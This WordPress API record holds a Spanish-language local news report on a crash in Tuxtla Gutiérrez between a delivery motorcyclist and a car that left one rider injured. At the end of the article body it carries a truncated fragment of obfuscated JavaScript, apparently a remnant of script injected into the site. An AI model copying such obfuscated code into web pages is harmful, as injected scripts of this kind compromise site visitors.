{"id":15280,"date":"2024-04-24T01:35:32","date_gmt":"2024-04-24T01:35:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15280"},"modified":"2024-04-24T01:35:35","modified_gmt":"2024-04-24T01:35:35","slug":"motorepartidor-y-particular-colisionan-en-la-5a-norte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15280","title":{"rendered":"Motorepartidor y particular colisionan en la 5a Norte"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"460\" data-id=\"15281\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922430978-1024x460.jpg\" alt=\"\" class=\"wp-image-15281\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922430978-1024x460.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922430978-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922430978-768x345.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922430978.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"460\" data-id=\"15282\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922427813-1024x460.jpg\" alt=\"\" class=\"wp-image-15282\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922427813-1024x460.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922427813-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922427813-768x345.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922427813.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"771\" height=\"1024\" data-id=\"15283\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922434061-771x1024.jpg\" alt=\"\" class=\"wp-image-15283\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922434061-771x1024.jpg 771w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922434061-226x300.jpg 226w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922434061-768x1020.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1713922434061.jpg 1080w\" sizes=\"auto, (max-width: 771px) 100vw, 771px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 23 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Da\u00f1os materiales y un herido, fue el saldo de una colisi\u00f3n entre un motociclista y una unidad particular a la altura de la 5a Norte y 10 Poniente, de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, todo ocurri\u00f3 cuando el repartidor de carne circulaba en una Honda Cargo de color blanco sobre la 5a Norte y al llegar a la 10a Poniente, se estrell\u00f3 contra un Jetta de color blanco.<\/p>\n\n\n\n<p>El joven identificado como Oswaldo de 23 a\u00f1os de edad sali\u00f3 volando y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana para atender al lesionado.<\/p>\n\n\n\n<p>El conductor de la unidad de nombre Julio Colmenares, dijo que ten\u00eda el sem\u00e1foro en verde.<\/p>\n\n\n\n<p>Al no llegar a un acuerdo armonioso, las dos unidades fueron trasladadas a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 23 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Da\u00f1os materiales y un herido, fue el saldo de una colisi\u00f3n entre un motociclista y una unidad particular a la altura de la 5a Norte y 10 Poniente, de Tuxtla Guti\u00e9rrez. Los reportes de tr\u00e1nsito informaron que, todo ocurri\u00f3 cuando el repartidor de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15281,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15280","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15280"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15280\/revisions"}],"predecessor-version":[{"id":15284,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15280\/revisions\/15284"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15281"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}